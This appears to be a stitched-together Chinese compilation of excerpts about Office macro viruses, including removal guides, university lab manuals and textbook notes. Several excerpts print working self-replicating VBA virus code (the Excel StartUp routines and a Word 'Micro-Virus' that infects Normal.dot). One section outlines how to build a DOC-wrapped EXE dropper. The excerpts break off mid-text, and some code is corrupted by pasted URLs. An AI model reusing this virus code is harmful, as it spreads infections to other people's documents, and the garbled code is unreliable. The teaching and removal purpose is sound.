Excel K4病毒ToDOLE病毒手动杀毒教程

以下症状可能是感染了ToDOLE病毒，也叫K4病毒，MERALCO病毒。

1.Excel宏安全性无法修改

2.每次都加载一个叫K4.xls或者Meralco.xls的文件

3.宏安全性修改后再查看发现宏安全性还是信任所有宏，并且“信任对VBA工程对象模型的访问”被勾选，灰色，无法修改。

4.查杀宏病毒后，报错，Excel找不到Macro1$A$2 。每次切换工作表都报告一次。

打开的Excel，按Alt+F11，看看有没有加载“k4.xls”或者“MERALCO.xls”。如果有，那么恭喜，你的电脑中了这个Excel VBA的宏病毒，该病毒对您的电脑主要做了一下工作：

1.复制了一个自己，文件名叫k4.xls到Excel信任工作路径下，也就是每次打开Excel的时候都会执行，

2.写入注册表，修改“Excel的宏安全性”为启用所有宏，以及勾选“信任对VBA工程对象模型的访问”，并且这样通过Excel设置无法修改。

3.给每个被感染病毒后打开的Excel文件创建一个宏

4.0的宏表，判断是否禁用了宏，如果禁用了宏，不让打开这个文件，同时在每个工作表上都加了一个定义名称，并指向“Macro1"表中的单元格"A2”,目的就是触发这个宏4.0代码。

4.每天指定时间打开Outlook，把收集来的信息通过邮箱发出去

手动清理这个病毒按照以下步骤做：

1.所有关闭Excel文件。

2.搜索k4.xls以及MERALCO.XLS，删掉所有这两个文件

3.regedit打开注册表搜索AccessVBOM，把找到的AccessVBOM键和值都删掉，以及把同在一个路径下的Level也删掉。

一般在下列路径下：

"HKEY_CURRENT_USER\Software\Microsoft\Office\"Office版本号"\Excel\Security\AccessVBOM”

"HKEY_CURRENT_USER\Software\Microsoft\Office\"Office版本号"\Excel\Security\Level" "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\"Office版本号"\Excel\Security\AccessVBOM"

"HKEY_LOCAL_MACHINE\Software\Microsoft\Office\"Office版本号"\Excel\Security\Level"

64位win7下的office2013位于以下路径。

"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\15.0\Excel\Security"

删掉上面Security下的所有键

4.所有被感染的文件都要删除两个文件

一个叫macro1的隐藏宏表

一个是按Alt+F11，删掉ToDOLE的模块，如果Thisworkbook也有Workbook_Open的话最好也一起清除了。

5.查杀了Macro1这个宏表后，如果这个文件已经被感染，点击任何一个

好了，按照上面的步骤做，你的Excel就清净了。

今天在帮同事处理这个宏病毒的时候匆忙写的，如有疏漏敬请见谅

宏病毒原理及防范

宏病毒原理及防范 一、常见宏病毒 1．startup宏病毒 宏病毒其实并不神秘，其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建，新建的文件常放在xlsrt文件夹下。然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。下面先看看startup宏病毒代码吧，注意红字部分。 Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.wendangku.net/doc/1f18045577.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.wendangku.net/doc/1f18045577.html, Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub 2．book1病毒 book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。这种病毒和startup病毒工作原理相似，但启动方式不太一样，该病毒会在excel文件中添加和复制一个宏表，利用宏表4。0程序的auto_open事件启动宏表中的宏代码，进行代码复制，病毒文件创建。打开中了book1病毒文件，在插入-名称里会出现很多陌生的定义名称，这些都是病毒启动名称。 二、病毒专杀 1．手工专杀 strartup.xls病毒。首先把宏的安全性设置为最高级，禁止所有宏运行。然后在电脑中搜索xlstart文件夹，找到后把该文件夹中的strartup.xls文件

实验三 脚本病毒和宏病毒分析

实验三脚本病毒和宏病毒分析 一、实验目的 通过这项实验旨在使学生掌握Office下宏病毒的基本原理，主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。 二、实验环境 操作系统环境：Windows98/NT/2000/XP 编程环境：Office VBA 三、实验基础知识要求 Office VBA编程环境 四、实验任务 1．任务性质：验证性实验 2．任务描述：下面的示例中给出的是一个Word宏病毒的示例程序（只有传染模块），仔细阅读源程序，掌握Word宏病毒的传染过程。 3．任务步骤： （1）打开Word2000，新建一个文档名为“test”； （2）点击“工具－宏－宏”，在对话框“宏的位置”选择“test”，在宏名中输入“autoclose”，然后点击“创建”按钮； （3）在VBA编辑环境中输入示例程序中给出的代码，并保存，然后退出VBA； （4）点击“工具－宏－宏”，在对话框中点击“管理器”按钮，在管理器对话框中点击“宏方案项”标签；在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”； （5）点击“工具－宏－安全性”，在安全性对话框中的安全级标签中选择“低”，在可靠性来源标签中选择“信任对VB项目的访问”； （6）保存并关闭“test”文档； （7）新建一个文档test1，关闭后重新打开，观察test1是否被感染。 （8）清除此宏病毒，即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。 4．示例程序 Sub autoclose() ' autoclose Macro ' 宏在2005-8-26 由jingjd 创建 On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False 'Options.VirusProtection = False Options.SaveNormalPrompt = False Const VirusName = "AOPEDMOK" 'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name 'MsgBox ActiveDocument.VBProject.VBComponents(2).Name Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt" For j = 1 To Doc.Count

计算机病毒原理及防范技术(精简版)

《计算机病毒原理及防范技术》----秦志光张凤荔刘峭著 43.8万字 第1章计算机病毒概述 1.1.1计算机病毒的起源----第一种为科学幻想起源说，第二种为恶作剧，第三种为戏程序（70年代，贝尔实验室，Core War）, 第四种为软件商保护软件起源说。 1.计算机病毒的发展历史-----第一代病毒，传统的病毒， 第二代病毒（1989-1991年），混合型病毒（或“超级病毒”），采取了自我保护措施（如加密技术，反跟踪技术）；第三代病毒(1992-1995年)多态性病毒（自我变形病毒）首创者Mark Washburn-----“1260病毒”；最早的多态性的实战病毒----“黑夜复仇者”（Dark Avenger）的变种MutationDark Avenger ；1992年第一个多态性计算机病毒生成器MtE,第一个计算机病毒构造工具集（Virus Construction Sets）----“计算机病毒创建库”（Virus Create Library）, ”幽灵”病毒；第四代病毒（1996-至今），使用文件传输协议（FTP）进行传播的蠕虫病毒，破坏计算机硬件的CIH，远程控制工具“后门”（Bank Orifice）,”网络公共汽车”（NetBus）等。 2.计算机病毒的基本特征----1.程序性（利用计算机软、硬件所固有的弱点所编制的、具有特殊功能的程序），2、传染性，3、隐蔽性（兼容性、程序不可见性）4、潜伏性（“黑色星期五”，“上海一号”，CIH）,5、破坏性，6、可触发性，7、不可预见性，8、针对性，9、非授权可执行性，10、衍生性。 1.2.2.计算机病毒在网络环境下表现的特征------1.电子邮件成主要媒介（QQ，MSN等即时通讯软件，可移动存储设备，网页，网络主动传播，网络，“钓鱼”），2.与黑客技术相融合（“Nimda”,CodeRed,”求职信”），3.采取了诸多的自我保护机制（逃避、甚至主动抑制杀毒软件），4.采用压缩技术（压缩变形----特征码改变，压缩算法，“程序捆绑器”），5.影响面广，后果严重，6.病毒编写越来越简单，7.摆脱平台依赖性的“恶意网页”。 1.2.3.计算机病毒的生命周期----1.孕育期（程序设计，传播），2.潜伏感染期，3.发病期，4.发现期，5.消化期，6.消亡期。 第2章计算机病毒的工作机制 2.1.1计算机病毒的典型组成三大模块-----1.引导模块（将病毒引入计算机内存，为传染模块和表现模块设置相应的启动条件），2.感染模块（两大功能-----1.依据引导模块设置的传染条件，做判断；2启动传染功能）， 3.表现模块（两大功能----依据引导模块设置的触发条件，做判断；或者说表现条件判断子模块 2.1启动病毒，即表现功能实现子模块） 2.2.1计算机病毒的寄生方式-----1.替代法（寄生在磁盘引导扇区）；2.链接法（链接在正常程序的首部、尾部、或中间）。 2.2.2．计算病毒的引导过程-----1。驻留内存，2.获得系统控制权， 3.恢复系统功能。 2.4.1.计算机病毒的触发机制----1.日期，2.时间， 3.键盘 4.感染触发， 5.启动， 6.访问磁盘次数， 7.调用中断功能触发， 8.CPU型号/主板型号触发。 第三章计算机病毒的表现 3.1.计算机病毒发作前的表现----1.经常无故死机，操作系统无法正常启动，运行速度异常， 4.内存不足的错误， 5.打印、通信及主机接口发生异常， 6.无意中要求对软盘进行写操作， 7.以前能正常运行的应用程序经常死机或者出现非法错误， 8.系统文件的时、日期和大小发生变化， 9.宏病毒的表现现象，10、磁盘空间迅速减少，11.网络驱动器卷或者共享目录无法调用，陌生人发来的电子邮件，13.自动链接到一些陌生的网站。

一个简单宏病毒的感染与清楚

宏病毒实验 1. 实验目的 （1）理解宏病毒的概念、病毒机制、传播手段以及预防措施。 （2）观察一个简单宏病毒感染计算机后的现象，并寻找清除病毒的方法。 2. 实验原理 宏（Macro）是微软公司出品的Office软件包中所包含的一项特殊功能。微软公司设计此项功能的主要目的是给用户自动执行一些重复性的工作提供方便。它利用简单的语法，把常用的动作写成宏，用户工作时就可以直接利用事先编写好的宏自动运行，以完成某项特定的任务，而不必反复重复相同的工作。微软的Word Visual Basic for Application(VBA)是宏语言的标准。宏病毒正是利用Word VBA 编写的一些宏，是一种寄存在文档或模板中的计算机病毒。一旦打开含有宏病毒的文档，其中的宏就会执行，宏病毒被激活，转移到计算机中并驻留在Normal 模板上。以后所有自动保存的文档都会感染上这种宏病毒。 预防宏病毒有以下几种基本的方法： （1）防止执行自动宏：可以通过在DOS提示符下输入指令”WinWord.exe /m DisableAutoMacro”来防止打开Word文档时执行自动宏。另外，在打开或关闭文档时按下Shift键可以使文档不执行任何自动宏。 （2）保护Normal模板：可以采取以下几种方法对Normal模板进行保护。提示保存Normal模板；设置Normal模板的只读属性；设置密码保护；设置安全级别；按照自己的习惯设置Normal模板并进行备份，当被病毒感染时，使用备份模板覆盖当前模板。 （3）使用DisableAutoMacro功能。 3. 实验环境 虚拟机下Windows server 2003 4. 实验内容 本实验拟在虚拟机下感染一个简单的宏病毒，然后观察病毒对计算机有什么影响，最后寻求清除方法。

计算机网络原理 宏病毒与蠕虫

计算机网络原理宏病毒与蠕虫 宏病毒是寄存在文档或模板的宏中。当用户撰写了有问题的宏，感染了通用模板（Normal.dot），那么只要一执行Word，这个受感染的通用模板便会传播到之后所编辑的文档中去，如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。 蠕虫病毒是计算机病毒的一种。它的传染机理是利用网络进行复制和传播，传染途径是通过网络和电子邮件。 下面我们分别来学习宏病毒以及蠕虫病毒。 1．宏病毒 许多应用程序都允许在用户的数据库中包含一些宏，随着应用软件的进步，宏语言的功能也越来越强大，其中微软的Word Visual Basic for Application（VBA）已经成为应用软件宏语言的标准。利用宏语言，可以实现几乎所有的操作，还可以实现一些应用软件原来没有的功能。每个模板或数据文件中，都可以包含宏命令。 有不少应用软件允许用户利用宏修改软件菜单的功能，并可以将某一个宏加入到菜单中或设置成自动运行的命令。利用这个功能，宏就可以修改软件本身的功能，从而将软件本身修改为病毒传播的源泉。 宏病毒就是利用Word VBA进行编写的一些宏，这些宏可以自动运行，干扰用户工作，轻则降低工作效率，重则破坏文件，使用户遭受巨大损失。一旦打开含有宏病毒的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。 1997年被公认为计算机反病毒界的"宏病毒"年。宏病毒主要感染WORD、EXCEL、ACCESS 等文件。目前国际上已发现五类：Word宏病毒、Excel宏病毒、Access宏病毒、Ami Pro宏病毒、Word Perfect宏病毒。其中Word宏病毒最多，流行最范围最广，96年下半年开始在我国出现，97年在全国各地广泛流行，成为目前最主要的病毒，宏病毒与其它计算机病毒一样，它能对用户系统中的可执行文件和数据文本类文件造成破坏。常见的如：Tw No.1(台湾一号)、Concept(概念)、SetMd、Cap、MdMa(无政府一号)等。 但宏病毒与以往的病毒相比较又有着截然不同的特点，具体表现为： ●感染数据文件。宏病毒感染数据文件，它彻底改变了人们对"数据文件不会传播病 毒"的错误认识； ●在多平台上传播。宏病毒冲破了以往病毒在单一平台上传播的局限性，当WORD、 EXCEL这类软件在不同平台(如WINDOWS、WINDOWS NT、OS/2和MACINTOSH等) 上运行时，就可能会被宏病毒交叉感染； ●编写及修改容易。以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是 以人们容易阅读的源代码形式出现，所以编写和修改宏病毒比以往病毒更容易； 此外，宏病毒还具有容易传播、隐蔽性强、危害巨大等特点。最终来说，宏病毒应该算是一种特殊的文件型病毒，同时它应该也可以算是"按程序运行平台分类"中的一种特例。 从宏病毒的特性和传播途径看，防范宏病毒的方法应从以下方面人手： ●对于已染病毒的文件首先应将Normal.dot中的自动宏清除（AutoOpen、AutoClose、 AutoNew），然后将Normal.dot置成只读方式。 ●对于其他已染毒的文件均应将自动宏清除，这样就可以达到清除病毒的目的。 ●平时使用时要加强预防。对来历不明的宏最好予以删除。如果发现后缀为.DOC的 文件变成模板时，则可怀疑其已染宏病毒，其主要表现是在SaveAs文档时，选择

宏病毒制作参考

-- Word宏病毒制作，传播，防范 EXE变DOC的方法 其实这种转换并不是文件格式上的变化,只不过是把一个exe文件接在一个doc文件的末尾而已,这个doc 文件当然就不是不同word的文档啦,该文档中包含了宏语句,能在 运行的时候把接在自己文件末尾的exe文件数据读取出来并运行,就 造成一种假象,好象文档打开时就运行了exe文件似的.(和文件捆绑器的原理很象啊!) 熟悉vb的朋友都知道,word的宏是使用vba来编写的,具体语法和vb一样,但有些方法vb中没有,如宏病毒 就是利用宏复制语句来达到感染的目的.和vb一样,我们可以在编写宏的时候调用windows api!!下面我们来介绍一下我们编写这个宏需要用到的api函数: 1)createfile 用于打开文件,该函数vb的声明如下: declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string, byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributes as long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long

2)closehandle 用于关闭被打开文件的句柄,该函数vb的声明如下: declare function closehandle lib "kernel32" (byval hobject as long) as long 3)readfile 用于从被打开文件中读取数据,该函数vb的声明如下: declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoread as long, lpnumberofbytesread as long, byval lpoverlapped as long) as long 4)writefile 用于把读取出的数据写入文件,该函数vb的声明如下: declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowrite as long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long 5)setfileponiter移动文件指针,该函数vb的声明如下: declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byval lpdistancetomovehigh as long, byval dwmovemethod as long) as long 6)下面是以上函数的参数声明 public const generic_read as long = &h80000000 public const generic_write as long = &h40000000 public const file_share_read as long = 1 public const file_share_write as long = 2 public const create_new as long = 1

Word宏病毒讲课稿

Word宏病毒 1.实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 2.实验所需条件和环境 硬件设备：局域网，终端PC机。 系统软件：Windows系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问 实验环境配置如下图所示： 受感染终端 受感染 Word文档 被感染终端宏病毒传播示意图 3.实验内容和分析 为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过

多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 3.1. 例1 自我复制，感染word公用模板和当前文档 代码如下： 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具→宏→Visual Basic→宏编辑器）,在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 3.1.1.代码解释 以上代码的基本执行流程如下： 1)进行必要的自我保护 Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将

东华大学计算机病毒课实验六宏病毒实验报告

计算机病毒实验报告 姓名： 学号: 老师： 日期：

一. 实验目的 Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 二. 实验内容 1. macro virus中的内容 2. 信安实验平台--->计算机病毒篇---->计算机宏病毒 3. 结合杀毒软件如诺顿、卡巴斯基等，观察病毒查杀现象 三. 实验环境 1. macro virus 硬件设备：局域网，终端PC机。 系统软件：Windows系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问. 实验环境配置如下图所示：

受感染终端 受感染Word 文档 被感染终端 2.计算机宏病毒 硬件设备：部署 WIN2003 系统的PC 机一台 软件工具：Office word2007

四．实验步骤及截图 1.自我复制，感染word公用模板和当前文档 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具宏Visual Basic宏编辑器）,在左侧的project—>Microsoft Word 对象ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒 只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument 中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

宏病毒防治

宏是Word 里一个非常有用的工具，但也是Word 的安全漏洞之一。有一些恶意的人利用宏制造宏病毒，给别人带来麻烦。宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，宏病毒就会被激活，转移到计算机上，并驻留在Normal 模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。 13.1 宏病毒 宏病毒已经成为发展最快和传播最迅速的病毒。美国国际计算机安全协会ICSA 的《ICSA 1998 病毒流行调查报告》表明宏病毒独占1998 年十大病毒感染事件的72%，在十大病毒中占了五席交椅：WM/Concept、WM/Cap、WM/Wazzu、WM/Npad 和XM/Laroux。根据DataFellow 公司每天特征码升级的F-Macro 所检测到的宏病毒数目，至1998 年12 月达到了3,332 个，而在1997 年12 月才是1,821个，增长率为83.0%。而且F-Macro 并不能检测到所有宏病毒。在1998 年12 月出现了Word Class Object 的宏病毒，是由VicodinES编写的。 13.1.1 宏病毒 许多应用程序都允许在用户的数据库中包含一些宏，随着应用软件的进步，宏语言的功能也越来越强大，其中微软的Word VisualBasic for Application（VBA）已经成为应用软件宏语言的标准。利用宏语言，可以实现几乎所有的操作，还可以实现一些应用软件原来没有的功能。每个模板或数据文件中，都可以包含宏命令。 有不少应用软件允许用户利用宏修改软件菜单的功能，并可以将某一个宏加入到菜单中或设置成自动运行的命令。利用这个功能，宏就可以修改软件本身的功能，从而将软件本身修改为病毒传播的源泉。 宏病毒就是利用Word VBA 进行编写的一些宏，这些宏可以自动运行，干扰用户工作，轻则降低工作效率，重则破坏文件，使用户遭受巨大损失。 一旦打开含有宏病毒的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal 模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。 宏病毒成为传播最快的病毒，其原因有三个：第一，现在用户几乎对可执行文件病毒和引导区病毒已经有了比较一致的认识，对这些病毒的防治都有一定的经验，许多公司、企业对可执行文件和磁盘的交换都有严格的规定。但对宏病毒的危害还没有足够的认识，而现在主要的工作就是交换数字文件，因此使宏病毒得到迅速传播。第二，现在的查病毒、防病毒软件主要是针对可执行文件和磁盘引导区设计的，一般都假定数据文件中不会存在病毒，而人们相信查病毒软件的结论，从而使隐藏在数据文件中的病毒成为漏网之鱼。第三，CD-ROM 和Interenet 使病毒的传播速度大大加快。 如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果Word 系统中的模板包含了宏病毒，我们称Word 系统感染了宏病毒。 Word 2000 无法扫描软盘、硬盘或网络驱动器上的宏病毒（要得到这种保护，需要购买和安装专门的防病毒软件）。但当打开一个含有可能携带病毒的宏的文档时，它能够显示宏警告信息。这样就可选择打开文档时是否要包含宏，如果希望文档包含要用到的宏（例如，单位所用的定货窗体），打开文档时就包含宏。如果您并不希望在文档中包含宏，或者不了解文档的确切来源。例如，文档是作为电子邮件的附件收到的，或是来自网络或不安全的Internet 节点。在这种情况下，为了防止可能发生的病毒传染，打开文档过程中出现宏警告提示时最好选择【取消宏】。 Word 软件包安装后，系统中包含有关于宏病毒防护的选项，其默认状态是允许【宏病毒保护】复选框。如果愿意，可以终止系统对文档宏病毒的检查。当Word 显示宏病毒警告信息时，清除【在打开带有宏或自定义内容的文档时提问】复选框。或者关闭宏检查：单击【工具】菜单中的【宏】命令，再从级联菜单中选择【安全性】命令，出现【安全性】对话框，选择【安全级】选项卡，将安全级别设为【无】。不过一般建议用户不要取消宏病毒防护功能，否则会失去这道防护宏病毒的天然屏障。

《计算机病毒》宏病毒的基本知识

宏病毒的基本知识王宇航09283020 宏病毒 一、宏病毒的基本知识 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。 运行环境：microsoft office word 特点：宏病毒是针对微软公司的字处理软件Word编写的一种病毒。微软公司的字处理软件是最为流行的编辑软件，并且跨越了多种系统平台，宏病毒充分利用了这一点得到恣意传播。宏病毒作为一种新型病毒有其特点与共性。 1．传播极快 Word宏病毒通过.DOC文档及.DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染 宏病毒，而对外来的文档文件基本是直接浏览使用，这给Word宏病毒传播带来很多便利。特别是Internet网络的普及，Email 的大量应用更为Word宏病毒传播铺平道路。根据国外较保守的统计，宏病毒的感染率高达40%以上，即在现实生活中每发现100个病毒，其中就有40多个宏病毒，而国际上普通病毒种类已达12000多种。

2．制作、变种方便 以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码宏语言WordBasic形式出现，所以编写和修改宏病毒比以往病毒更容易。世界上的宏病毒原型己有几十种，其变种与日俱增，追究其原因还是Word的开放性所致。现在的Word 病毒都是用WordBasic语言所写成，大部分Word病毒宏并没有使用Word提供的Execute-Only处理函数处理，它们仍处于可打开阅读修改状态。所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。当然会有“不法之徒”利用掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变，立即就生产出了一种新的宏病毒，甚至比原病毒的危害更加严重。 3．破坏可能性极大 鉴于宏病毒用WordBasic语言编写，WordBasic语言提供了许多系统级底层调用，如直接使用DOS系统命令，调用WindowsAPI，调用DDE或DLL等。这些操作均可能对系统直接构成威胁，而Word 在指令安全性、完整性上检测能力很弱，破坏系统的指令很容易被执行。宏病毒Nuclear就是破坏操作系统的典型一例。 4．多平台交叉感染 宏病毒冲破了以往病毒在单一平台上传播的局限，当WORDJXCEL这类著名应用软件在不同平台（如Windows、Windo_wsNT、OS/2和MACINTOSH等）上运行时，会被宏病毒交叉感染。 二、作用机制

Excel 宏病毒的分析与防治.

Excel 宏病毒的分析与防治

摘要：Excel 作为 Microsoft Office 软件的重要组成部分，其强大的数据分析、统计处理和决策支 持能力得到人们的喜爱，并在各个领域被广泛使用。正是如此，它也成为宏病毒最主要的侵害对象之一。 因此研究 Excel 宏病毒机理和反宏病毒技术，以便更好地对 Excel 宏病毒的传播进行控制和预防意义重大。 关键词：宏；计算机病毒；Excel 宏病毒

Excel Macro Virus Analysis and Prevention TENG Ping ( Liaoning police Academy ,Dalian Liaoning 116036, China ) Abstract: Excel as the Microsoft Office suite is an important part of its powerful data processing, statistical analysis and decision support capabilities to get people's favorite and widely used in many areas. Is the case, it has also become a major crime against macro viruses. Therefore, to study the mechanism of the Excel macro virus and anti- macro virus technology, so as to better control and prevention of significance significant Excel macro viruses spread. Key words: macro; computer viruses; excel macro viruse

Excel Startup 宏病毒的预防

Excel Startup 宏病毒的预防 征状： 打开excel文件不做任何改动，但关闭时会提示是否要保存更改；Excel菜单中的工具--选项--重新计算下面的自动重算被改为手动重算，致使公式不能自动计算，按保存后才计算；excel文件被多次感染后，将会带多个startup宏模块，此时打开excel时将会出现数据闪烁；提示找不到StartUp.xls；或者提示“发现二义性的名称：auto_open ”等这些不正常现象。 源头： Excel 的宏安全性降到最低后，打开一个带有Startup宏病毒的excel文件，将会在路径为%APPDATA%\Microsoft\Excel\XLSTART 的目录下面生成一个Startup.xls的病毒模板，这个目录是一个Excel模板加载文件存放的目录，并以它做为感染源，以后所有打开的excel文件都因为加载它而被感染。它是一个被动感染而不是主动感染。 预防: 只要封住excel加载的目录文件就可以让它不再继续感染，防止病毒扩大传播。下面的程序可以封住这个目录，运行前请关闭所有打开的excel文件，（仅限NTFS格式下使用），可做登陆脚本。 @echo off pushd %~dp0 %systemdrive% del "%APPDATA%\Microsoft\Excel\XLSTART\StartUp.xls" /q /f cd "%APPDATA%\Microsoft\Excel" rem 如果登陆的用户为域用户 echo y| cacls XLSTART /d %username%@%userdomain% rem 如果登陆的用户为本地用户 echo y| cacls XLSTART /d %username% 上面只是预防病毒在每个用户下面使用excel时不再继续感染电脑上的其它Excel文件，但是原来有病毒的还是有病毒。 手动清除方法： 1、当打开的Excel有如上提示的中毒征状时，点击“工具”-->“宏”--->“Visual Basic编辑器（V）”。